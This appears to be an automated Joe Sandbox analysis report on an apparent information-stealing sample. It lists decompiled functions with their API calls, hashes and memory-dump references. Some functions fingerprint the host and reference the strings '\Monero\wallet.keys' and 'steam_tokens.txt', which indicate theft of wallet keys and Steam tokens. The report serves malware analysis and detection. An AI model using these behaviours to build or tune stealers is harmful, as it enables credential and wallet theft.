Opcode ID: 21ba4f127167d4975576a479b967e360bee61933c0882e9ca768275947e03a91
Instruction ID: 79b8900b45d22a47078dca02e73199555d28395e04e0cede3685a21ac14ab85e
Opcode Fuzzy Hash: 21ba4f127167d4975576a479b967e360bee61933c0882e9ca768275947e03a91
Instruction Fuzzy Hash: 6BF0827490020CFBDB09DFA4DC8AFED7778EB48304F004498BB499B290DAB06E85DB91

Function 003A1110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 003A1132
ExitProcess.KERNEL32 ref: 003A1143

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 2db10f7e868a5db61beddae3e3355e9d466be0cb6ed5c00c6f8df782bfc11a03
Instruction ID: 31cc5975327165375b5bf3a4d468f1f5e3fe7f6c43c37b660b33ae11a8034fe9
Opcode Fuzzy Hash: 2db10f7e868a5db61beddae3e3355e9d466be0cb6ed5c00c6f8df782bfc11a03
Instruction Fuzzy Hash: 03E086B0949348FFE714ABB09C0AB087A78EB14B01F104044F7087E1C0D6B43604A699

Function 003B1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003B7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003B7542
Part of subcall function 003B7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003B757F
Part of subcall function 003B7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7603
Part of subcall function 003B7500: RtlAllocateHeap.NTDLL(00000000), ref: 003B760A

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003B7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B76A4
Part of subcall function 003B7690: RtlAllocateHeap.NTDLL(00000000), ref: 003B76AB

Part of subcall function 003B77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,003BDBC0,000000FF,?,003B1C99,00000000,?,00F3D290,00000000,?), ref: 003B77F2
Part of subcall function 003B77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,003BDBC0,000000FF,?,003B1C99,00000000,?,00F3D290,00000000,?), ref: 003B77F9

Part of subcall function 003B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003A11B7), ref: 003B7880
Part of subcall function 003B7850: RtlAllocateHeap.NTDLL(00000000), ref: 003B7887
Part of subcall function 003B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003B789F

Part of subcall function 003B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7910
Part of subcall function 003B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003B7917
Part of subcall function 003B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003B792F

Part of subcall function 003B7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003C0E00,00000000,?), ref: 003B79B0
Part of subcall function 003B7980: RtlAllocateHeap.NTDLL(00000000), ref: 003B79B7
Part of subcall function 003B7980: GetLocalTime.KERNEL32(?,?,?,?,?,003C0E00,00000000,?), ref: 003B79C4
Part of subcall function 003B7980: wsprintfA.USER32 ref: 003B79F3

Part of subcall function 003B7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00F3E948,00000000,?,003C0E10,00000000,?,00000000,00000000), ref: 003B7A63
Part of subcall function 003B7A30: RtlAllocateHeap.NTDLL(00000000), ref: 003B7A6A
Part of subcall function 003B7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00F3E948,00000000,?,003C0E10,00000000,?,00000000,00000000,?), ref: 003B7A7D

Part of subcall function 003B7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00F3E948,00000000,?,003C0E10,00000000,?,00000000,00000000), ref: 003B7B35

Part of subcall function 003B7B90: GetKeyboardLayoutList.USER32(00000000,00000000,003C05AF), ref: 003B7BE1
Part of subcall function 003B7B90: LocalAlloc.KERNEL32(00000040,?), ref: 003B7BF9
Part of subcall function 003B7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 003B7C0D
Part of subcall function 003B7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 003B7C62
Part of subcall function 003B7B90: LocalFree.KERNEL32(00000000), ref: 003B7D22

Part of subcall function 003B7D80: GetSystemPowerStatus.KERNEL32(?), ref: 003B7DAD

GetCurrentProcessId.KERNEL32(00000000,?,00F3D2D0,00000000,?,003C0E24,00000000,?,00000000,00000000,?,00F3EB40,00000000,?,003C0E20,00000000), ref: 003B207E

Part of subcall function 003B9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 003B9484
Part of subcall function 003B9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003B94A5
Part of subcall function 003B9470: CloseHandle.KERNEL32(00000000), ref: 003B94AF

Part of subcall function 003B7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7E37
Part of subcall function 003B7E00: RtlAllocateHeap.NTDLL(00000000), ref: 003B7E3E
Part of subcall function 003B7E00: RegOpenKeyExA.KERNEL32(80000002,00F2B8D0,00000000,00020119,?), ref: 003B7E5E
Part of subcall function 003B7E00: RegQueryValueExA.KERNEL32(?,00F3D2B0,00000000,00000000,000000FF,000000FF), ref: 003B7E7F
Part of subcall function 003B7E00: RegCloseKey.ADVAPI32(?), ref: 003B7E92

Part of subcall function 003B7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 003B7FC9
Part of subcall function 003B7F60: GetLastError.KERNEL32 ref: 003B7FD8

Part of subcall function 003B7ED0: GetSystemInfo.KERNEL32(003C0E2C), ref: 003B7F00
Part of subcall function 003B7ED0: wsprintfA.USER32 ref: 003B7F16

Part of subcall function 003B8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00F3EA38,00000000,?,003C0E2C,00000000,?,00000000), ref: 003B8130
Part of subcall function 003B8100: RtlAllocateHeap.NTDLL(00000000), ref: 003B8137
Part of subcall function 003B8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003B8158
Part of subcall function 003B8100: wsprintfA.USER32 ref: 003B81AC

Part of subcall function 003B87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003C0E28,00000000,?), ref: 003B882F
Part of subcall function 003B87C0: RtlAllocateHeap.NTDLL(00000000), ref: 003B8836
Part of subcall function 003B87C0: wsprintfA.USER32 ref: 003B8850

Part of subcall function 003B8320: RegOpenKeyExA.KERNEL32(00000000,00F39E30,00000000,00020019,00000000,003C05B6), ref: 003B83A4

Part of subcall function 003B8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003B8426
Part of subcall function 003B8320: wsprintfA.USER32 ref: 003B8459
Part of subcall function 003B8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003B847B
Part of subcall function 003B8320: RegCloseKey.ADVAPI32(00000000), ref: 003B848C
Part of subcall function 003B8320: RegCloseKey.ADVAPI32(00000000), ref: 003B8499

Part of subcall function 003B8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003C05B7), ref: 003B86CA
Part of subcall function 003B8680: Process32First.KERNEL32(?,00000128), ref: 003B86DE
Part of subcall function 003B8680: Process32Next.KERNEL32(?,00000128), ref: 003B86F3
Part of subcall function 003B8680: CloseHandle.KERNEL32(?), ref: 003B8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 003B265B

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: d824f1c76a5bc42b80bc47607b42df1567665bf2c8014f6a5cf72f4696fb9426
Instruction ID: c1d56934939267456267546f14e458f8c18f1e8500d2f28640d357447d8cc3ba
Opcode Fuzzy Hash: d824f1c76a5bc42b80bc47607b42df1567665bf2c8014f6a5cf72f4696fb9426
Instruction Fuzzy Hash: 5F728271C10918BADB1BFBA0DCA1EDE777CAF14304F504299B216AA851EF303B49DB65

Function 003A6D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a34988b0b70c8b2111d19dbf34cb1a3193ec22b229e83b7261e72ae1ab72a69
Instruction ID: 4a8ac6d8f62cfd5eb3d09fa09644751a7a986b0762fea02f131ff2f8fddcbbc3
Opcode Fuzzy Hash: 5a34988b0b70c8b2111d19dbf34cb1a3193ec22b229e83b7261e72ae1ab72a69
Instruction Fuzzy Hash: 006127B4D00218EFCB15CF94E986BEEB7B4FB45304F188598E4196B280D735AE94DF91

Function 003B5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA820: lstrlen.KERNEL32(003A4F05,?,?,003A4F05,003C0DDE), ref: 003BA82B
Part of subcall function 003BA820: lstrcpy.KERNEL32(003C0DDE,00000000), ref: 003BA885

lstrlen.KERNEL32(00000000,00000000,003C0ACA), ref: 003B512A

Strings

steam_tokens.txt, xrefs: 003B513F

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: d1e6b93840aecd1a451f974bcf9ee89222b2a7257fd3bed19a76512e997295c3
Instruction ID: 4beba0fd4a859f70dcff6b00c41717b44e1ef9d5be3a23011ba8dd2597255f88
Opcode Fuzzy Hash: d1e6b93840aecd1a451f974bcf9ee89222b2a7257fd3bed19a76512e997295c3
Instruction Fuzzy Hash: DFF06D31C0090876CB0AFBB0DC53EED773CEB51304F404158B652AA892EF246A09C7A2

Function 003B7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(003C0E2C), ref: 003B7F00
wsprintfA.USER32 ref: 003B7F16

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 2979fde573bff75d9b4c94ddcf30f6b360f3ac33662b9a5d1e44f04cd399901f
Instruction ID: e5cdfaec98e73c6519aae40026a6aaaab312db8075ff4701ca952bdbdfdd524f
Opcode Fuzzy Hash: 2979fde573bff75d9b4c94ddcf30f6b360f3ac33662b9a5d1e44f04cd399901f
Instruction Fuzzy Hash: 92F090B2A04258EBCB14CF94DC45FEAF7BCFB88B24F000669F61592680D77569048BE5

Function 003AB4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003BA740: lstrcpy.KERNEL32(003C0E17,00000000), ref: 003BA788

Part of subcall function 003BA9B0: lstrlen.KERNEL32(?,00F38938,?,\Monero\wallet.keys,003C0E17), ref: 003BA9C5
Part of subcall function 003BA9B0: lstrcpy.KERNEL32(00000000), ref: 003BAA04
Part of subcall function 003BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003BAA12

Part of subcall function 003BA920: lstrcpy.KERNEL32(00000000,?), ref: 003BA972
Part of subcall function 003BA920: lstrcat.KERNEL32(00000000), ref: 003BA982

Part of subcall function 003BA8A0: lstrcpy.KERNEL32(?,003C0E17), ref: 003BA905

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

lstrlen.KERNEL32(00000000), ref: 003AB9C2
lstrlen.KERNEL32(00000000), ref: 003AB9D6

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

